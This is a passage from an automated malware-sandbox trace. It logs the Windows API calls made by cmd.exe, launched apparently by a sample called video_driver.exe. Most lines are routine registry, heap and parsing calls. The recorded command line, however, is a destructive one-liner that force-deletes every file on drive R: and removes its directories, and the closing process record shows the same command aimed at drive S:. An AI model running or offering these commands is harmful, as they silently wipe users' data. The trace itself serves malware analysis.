lpBuffer=0x35f864, dwLength=0x1c | out: lpBuffer=0x35f864*(BaseAddress=0x35f000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.740] VirtualQuery (in: lpAddress=0x260000, lpBuffer=0x35f864, dwLength=0x1c | out: lpBuffer=0x35f864*(BaseAddress=0x260000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0068.740] VirtualQuery (in: lpAddress=0x261000, lpBuffer=0x35f864, dwLength=0x1c | out: lpBuffer=0x35f864*(BaseAddress=0x261000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0068.740] VirtualQuery (in: lpAddress=0x263000, lpBuffer=0x35f864, dwLength=0x1c | out: lpBuffer=0x35f864*(BaseAddress=0x263000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.740] VirtualQuery (in: lpAddress=0x360000, lpBuffer=0x35f864, dwLength=0x1c | out: lpBuffer=0x35f864*(BaseAddress=0x360000, AllocationBase=0x360000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0068.740] GetConsoleOutputCP () returned 0x1b5 [0068.740] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0068.740] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0068.740] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.740] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0068.741] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.741] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0068.741] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.741] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0068.741] _get_osfhandle (_FileHandle=0) returned 0x3 [0068.741] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0068.741] GetEnvironmentStringsW () returned 0x7120f8* [0068.741] GetProcessHeap () returned 0x700000 [0068.741] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0xaca) returned 0x712bd0 [0068.742] FreeEnvironmentStringsW (penv=0x7120f8) returned 1 [0068.742] GetProcessHeap () returned 0x700000 [0068.742] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x4) returned 0x711898 [0068.742] GetEnvironmentStringsW () returned 0x7120f8* [0068.742] GetProcessHeap () returned 0x700000 [0068.742] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0xaca) returned 0x7136a8 [0068.742] FreeEnvironmentStringsW (penv=0x7120f8) returned 1 [0068.742] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x35e804 | out: phkResult=0x35e804*=0x68) returned 0x0 [0068.742] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x35e80c, lpData=0x35e810, lpcbData=0x35e808*=0x1000 | out: lpType=0x35e80c*=0x0, lpData=0x35e810*=0x0, lpcbData=0x35e808*=0x1000) returned 0x2 [0068.742] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x35e80c, lpData=0x35e810, lpcbData=0x35e808*=0x1000 | out: lpType=0x35e80c*=0x4, lpData=0x35e810*=0x1, lpcbData=0x35e808*=0x4) returned 0x0 [0068.742] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x35e80c, lpData=0x35e810, lpcbData=0x35e808*=0x1000 | out: lpType=0x35e80c*=0x0, lpData=0x35e810*=0x1, lpcbData=0x35e808*=0x1000) returned 0x2 [0068.742] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x35e80c, lpData=0x35e810, lpcbData=0x35e808*=0x1000 | out: lpType=0x35e80c*=0x4, lpData=0x35e810*=0x0, lpcbData=0x35e808*=0x4) returned 0x0 [0068.742] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x35e80c, lpData=0x35e810, lpcbData=0x35e808*=0x1000 | out: lpType=0x35e80c*=0x4, lpData=0x35e810*=0x40, lpcbData=0x35e808*=0x4) returned 0x0 [0068.742] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x35e80c, lpData=0x35e810, lpcbData=0x35e808*=0x1000 | out: lpType=0x35e80c*=0x4, lpData=0x35e810*=0x40, lpcbData=0x35e808*=0x4) returned 0x0 [0068.743] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x35e80c, lpData=0x35e810, lpcbData=0x35e808*=0x1000 | out: lpType=0x35e80c*=0x0, lpData=0x35e810*=0x40, lpcbData=0x35e808*=0x1000) returned 0x2 [0068.743] RegCloseKey (hKey=0x68) returned 0x0 [0068.743] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x35e804 | out: phkResult=0x35e804*=0x68) returned 0x0 [0068.743] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x35e80c, lpData=0x35e810, lpcbData=0x35e808*=0x1000 | out: lpType=0x35e80c*=0x0, lpData=0x35e810*=0x40, lpcbData=0x35e808*=0x1000) returned 0x2 [0068.743] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x35e80c, lpData=0x35e810, lpcbData=0x35e808*=0x1000 | out: lpType=0x35e80c*=0x4, lpData=0x35e810*=0x1, lpcbData=0x35e808*=0x4) returned 0x0 [0068.743] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x35e80c, lpData=0x35e810, lpcbData=0x35e808*=0x1000 | out: lpType=0x35e80c*=0x0, lpData=0x35e810*=0x1, lpcbData=0x35e808*=0x1000) returned 0x2 [0068.743] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x35e80c, lpData=0x35e810, lpcbData=0x35e808*=0x1000 | out: lpType=0x35e80c*=0x4, lpData=0x35e810*=0x0, lpcbData=0x35e808*=0x4) returned 0x0 [0068.743] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x35e80c, lpData=0x35e810, lpcbData=0x35e808*=0x1000 | out: lpType=0x35e80c*=0x4, lpData=0x35e810*=0x9, lpcbData=0x35e808*=0x4) returned 0x0 [0068.743] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x35e80c, lpData=0x35e810, lpcbData=0x35e808*=0x1000 | out: lpType=0x35e80c*=0x4, lpData=0x35e810*=0x9, lpcbData=0x35e808*=0x4) returned 0x0 [0068.743] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x35e80c, lpData=0x35e810, lpcbData=0x35e808*=0x1000 | out: lpType=0x35e80c*=0x0, lpData=0x35e810*=0x9, lpcbData=0x35e808*=0x1000) returned 0x2 [0068.743] RegCloseKey (hKey=0x68) returned 0x0 [0068.743] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6e [0068.743] srand (_Seed=0x5eb34b6e) [0068.743] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"R:\" del /f /s /q \"R:\" & FOR /D %p IN (\"R:\") DO rmdir \"%p\" /s /q" [0068.743] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"R:\" del /f /s /q \"R:\" & FOR /D %p IN (\"R:\") DO rmdir \"%p\" /s /q" [0068.744] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.744] GetProcessHeap () returned 0x700000 [0068.744] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x210) returned 0x7120f8 [0068.744] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x712100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0068.744] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.744] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.744] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.744] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0068.744] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0068.744] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0068.744] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0068.744] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0068.744] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0068.744] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0068.744] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0068.744] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0068.744] GetProcessHeap () returned 0x700000 [0068.744] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x712bd0 | out: hHeap=0x700000) returned 1 [0068.744] GetEnvironmentStringsW () returned 0x712310* [0068.744] GetProcessHeap () returned 0x700000 [0068.745] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0xae2) returned 0x714c70 [0068.745] FreeEnvironmentStringsW (penv=0x712310) returned 1 [0068.745] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0068.745] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.745] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0068.745] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0068.745] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0068.745] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0068.745] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0068.745] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0068.745] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0068.745] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0068.745] GetProcessHeap () returned 0x700000 [0068.745] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x54) returned 0x7117c8 [0068.745] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x35f5d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.745] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x35f5d0, lpFilePart=0x35f5cc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x35f5cc*="Desktop") returned 0x25 [0068.745] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0068.745] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x35f34c | out: lpFindFileData=0x35f34c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x715760 [0068.745] FindClose (in: hFindFile=0x715760 | out: hFindFile=0x715760) returned 1 [0068.746] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x35f34c | out: lpFindFileData=0x35f34c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x715760 [0068.746] FindClose (in: hFindFile=0x715760 | out: hFindFile=0x715760) returned 1 [0068.746] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0068.746] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x35f34c | out: lpFindFileData=0x35f34c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x715760 [0068.746] FindClose (in: hFindFile=0x715760 | out: hFindFile=0x715760) returned 1 [0068.746] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0068.746] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0068.746] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0068.746] GetProcessHeap () returned 0x700000 [0068.746] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x714c70 | out: hHeap=0x700000) returned 1 [0068.746] GetEnvironmentStringsW () returned 0x714180* [0068.746] GetProcessHeap () returned 0x700000 [0068.746] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0xb36) returned 0x715fa0 [0068.746] FreeEnvironmentStringsW (penv=0x714180) returned 1 [0068.746] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.746] GetProcessHeap () returned 0x700000 [0068.746] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x7117c8 | out: hHeap=0x700000) returned 1 [0068.747] GetProcessHeap () returned 0x700000 [0068.747] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x400e) returned 0x716ae0 [0068.747] GetProcessHeap () returned 0x700000 [0068.747] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0xa0) returned 0x712e50 [0068.747] GetProcessHeap () returned 0x700000 [0068.747] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x716ae0 | out: hHeap=0x700000) returned 1 [0068.747] GetConsoleOutputCP () returned 0x1b5 [0068.747] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0068.747] GetUserDefaultLCID () returned 0x409 [0068.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0068.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x35f710, cchData=128 | out: lpLCData="0") returned 2 [0068.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x35f710, cchData=128 | out: lpLCData="0") returned 2 [0068.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x35f710, cchData=128 | out: lpLCData="1") returned 2 [0068.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0068.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0068.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0068.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0068.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0068.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0068.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0068.749] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0068.749] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0068.749] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0068.749] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0068.750] GetProcessHeap () returned 0x700000 [0068.750] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x20c) returned 0x712ef8 [0068.750] GetConsoleTitleW (in: lpConsoleTitle=0x712ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0068.750] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0068.750] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0068.750] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0068.750] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0068.751] GetProcessHeap () returned 0x700000 [0068.751] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x400a) returned 0x716ae0 [0068.751] GetProcessHeap () returned 0x700000 [0068.751] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x4008) returned 0x71aaf8 [0068.751] GetProcessHeap () returned 0x700000 [0068.751] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x1a) returned 0x7157e0 [0068.751] GetEnvironmentVariableW (in: lpName="p IN (\"R", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.751] _wcsicmp (_String1="p IN (\"R", _String2="CD") returned 13 [0068.751] _wcsicmp (_String1="p IN (\"R", _String2="ERRORLEVEL") returned 11 [0068.751] _wcsicmp (_String1="p IN (\"R", _String2="CMDEXTVERSION") returned 13 [0068.751] _wcsicmp (_String1="p IN (\"R", _String2="CMDCMDLINE") returned 13 [0068.751] _wcsicmp (_String1="p IN (\"R", _String2="DATE") returned 12 [0068.751] _wcsicmp (_String1="p IN (\"R", _String2="TIME") returned -4 [0068.751] _wcsicmp (_String1="p IN (\"R", _String2="RANDOM") returned -2 [0068.751] _wcsicmp (_String1="p IN (\"R", _String2="HIGHESTNUMANODENUMBER") returned 8 [0068.751] GetProcessHeap () returned 0x700000 [0068.751] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x7157e0 | out: hHeap=0x700000) returned 1 [0068.751] GetProcessHeap () returned 0x700000 [0068.751] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x71aaf8 | out: hHeap=0x700000) returned 1 [0068.752] GetProcessHeap () returned 0x700000 [0068.752] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x4008) returned 0x71aaf8 [0068.752] GetProcessHeap () returned 0x700000 [0068.752] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x71aaf8 | out: hHeap=0x700000) returned 1 [0068.752] GetProcessHeap () returned 0x700000 [0068.752] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x716ae0 | out: hHeap=0x700000) returned 1 [0068.752] _wcsicmp (_String1="if", _String2=")") returned 64 [0068.752] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0068.752] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0068.752] _wcsicmp (_String1="IF", _String2="if") returned 0 [0068.752] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0068.752] GetProcessHeap () returned 0x700000 [0068.752] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x58) returned 0x713110 [0068.752] GetProcessHeap () returned 0x700000 [0068.752] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0xe) returned 0x70ffc0 [0068.753] GetProcessHeap () returned 0x700000 [0068.753] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x20) returned 0x7157e0 [0068.753] GetProcessHeap () returned 0x700000 [0068.753] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x7157e0, Size=0x16) returned 0x711800 [0068.753] GetProcessHeap () returned 0x700000 [0068.753] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x711800) returned 0x16 [0068.753] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0068.754] GetProcessHeap () returned 0x700000 [0068.754] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x58) returned 0x713170 [0068.754] GetProcessHeap () returned 0x700000 [0068.754] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x14) returned 0x7131d0 [0068.754] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0068.754] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0068.754] GetProcessHeap () returned 0x700000 [0068.754] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x12) returned 0x7131f0 [0068.754] GetProcessHeap () returned 0x700000 [0068.754] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x1c) returned 0x7157e0 [0068.754] GetProcessHeap () returned 0x700000 [0068.754] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x7157e0, Size=0x14) returned 0x713210 [0068.755] GetProcessHeap () returned 0x700000 [0068.755] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x713210) returned 0x14 [0068.755] _wcsicmp (_String1="del", _String2=")") returned 59 [0068.755] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0068.755] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0068.755] _wcsicmp (_String1="IF", _String2="del") returned 5 [0068.755] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0068.755] _wcsicmp (_String1="REM", _String2="del") returned 14 [0068.755] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0068.755] GetProcessHeap () returned 0x700000 [0068.755] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x58) returned 0x713230 [0068.755] GetProcessHeap () returned 0x700000 [0068.755] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x10) returned 0x70ffd8 [0068.756] GetProcessHeap () returned 0x700000 [0068.756] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x28) returned 0x713290 [0068.756] GetProcessHeap () returned 0x700000 [0068.756] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x58) returned 0x7132c0 [0068.757] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0068.757] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0068.757] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0068.757] GetProcessHeap () returned 0x700000 [0068.757] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x58) returned 0x713320 [0068.757] GetProcessHeap () returned 0x700000 [0068.757] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x44) returned 0x713380 [0068.757] GetProcessHeap () returned 0x700000 [0068.757] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x14) returned 0x7133d0 [0068.757] GetProcessHeap () returned 0x700000 [0068.757] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x7133d0, Size=0x12) returned 0x7133d0 [0068.757] GetProcessHeap () returned 0x700000 [0068.757] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x7133d0) returned 0x12 [0068.757] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0068.758] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0068.758] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0068.758] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0068.758] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0068.758] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0068.758] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0068.758] GetProcessHeap () returned 0x700000 [0068.758] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x12) returned 0x7133f0 [0068.759] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0068.759] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0068.760] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0068.760] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0068.760] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0068.760] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0068.760] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0068.760] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0068.760] GetProcessHeap () returned 0x700000 [0068.760] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x58) returned 0x713410 [0068.760] GetProcessHeap () returned 0x700000 [0068.760] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x14) returned 0x713470 [0068.760] GetProcessHeap () returned 0x700000 [0068.760] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x20) returned 0x7157e0 [0068.761] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0068.763] GetFullPathNameW (in: lpFileName="R:", nBufferLength=0x208, lpBuffer=0x35f400, lpFilePart=0x35f1ac | out: lpBuffer="R:\\", lpFilePart=0x35f1ac*=0x0) returned 0x3 [0068.763] wcsncmp (_String1="R:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -10 [0068.767] GetFileAttributesW (lpFileName="R:\\" (normalized: "r:")) returned 0xffffffff [0068.767] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.767] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0068.767] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.767] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0068.768] _get_osfhandle (_FileHandle=0) returned 0x3 [0068.768] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0068.768] SetConsoleInputExeNameW () returned 0x1 [0068.768] GetConsoleOutputCP () returned 0x1b5 [0068.768] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0068.768] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.768] exit (_Code=0) Process: id = "63" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x4279a000" os_pid = "0x788" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"S:\" del /f /s /q \"S:\" & FOR /D %p IN (\"S:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], 